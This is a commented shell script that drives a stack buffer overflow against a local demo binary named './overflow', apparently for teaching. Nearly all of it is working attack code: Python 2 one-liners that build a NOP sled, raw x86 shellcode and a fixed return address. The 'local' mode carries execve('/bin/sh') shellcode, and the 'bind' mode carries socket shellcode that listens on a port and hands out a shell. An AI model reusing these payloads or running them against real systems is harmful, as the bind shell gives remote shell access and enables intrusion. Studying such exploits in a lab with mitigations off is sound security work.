#!/bin/sh

# shellcode generated with metasploit (exec /bin/sh):
#   ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'
# return addr ./overflow (x86): 0xbffff412
#
# Driver for the ./overflow demo binary kept alongside this script: it builds
# one oversized argument (NOP sled + payload + NOP sled + return address) with
# an inline python one-liner and passes it as argv[1] of ./overflow.
#
# Usage: exploit.sh [local|bind]
#
# Notes for the reader:
#   - The return address is a fixed stack address, so the run only lands when
#     the process layout is exactly the one the header comment was taken from.
#     A fixed address like this is precisely what ASLR is designed to break;
#     the demo presumably runs with the usual mitigations off (confirm on the
#     machine before assuming a miss means the binary is fixed).
#   - Both modes are gated on a 32-bit userland (getconf LONG_BIT); on 64-bit
#     nothing is executed and the script exits 0 without saying so.
#   - The python one-liner uses `print "..."` statement syntax, i.e. it is
#     written for a Python 2 interpreter (see the inline comments below).

# the mode argument is required; print the usage line and exit 1 otherwise.
if [ -z "$1" ]; then
	echo "$0 [local|bind]"
	exit 1
fi

echo "$0: exec exploit .."
if [ "$1" = "local" ]; then
	# NOTE(review): the command substitution is unquoted; harmless for the
	# single numeric token getconf prints, but "$(getconf LONG_BIT)" is the
	# safe form.
	if [ $(getconf LONG_BIT) -eq 32 ]; then
		# 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr
		# uses own shellcode: shellcode/hello.asm (x86-nasm)
		#
		# The layout line above describes the original 70-byte metasploit
		# payload; the hand-written payload actually used here is 29 bytes,
		# and the leading sled is grown to 158 so the data before the return
		# address still totals 304 bytes (158 + 29 + 117).  Backticks run the
		# python one-liner and its whole stdout becomes the single argv[1].
		./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\x12\xf4\xff\xbf"'`
	fi
elif [ "$1" = "bind" ]; then
	# same 32-bit gate as the "local" branch (same quoting note applies).
	if [ $(getconf LONG_BIT) -eq 32 ]; then
		# 85 bytes NOP + 134 bytes shellcode + 85 bytes NOP + return addr
		# uses own shellcode: shellcode/socket.asm (x86-nasm)
		#
		# Per the line above this is 85 + 134 + 85 = 304 bytes before the
		# return address, i.e. the same total as the "local" variant.  The
		# payload listens on a port fixed inside socket.asm (not on this page;
		# check that file for the value a detection rule should watch for).
		./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x12\xf4\xff\xbf"'`
	fi
else
	# unknown mode: re-run ourselves with no arguments, which takes the
	# usage branch at the top (prints the usage line, exits 1); that status
	# is then this script's exit status.  $0 is unquoted here -- fine for a
	# path without whitespace, "$0" would be the safe form.
	$0
fi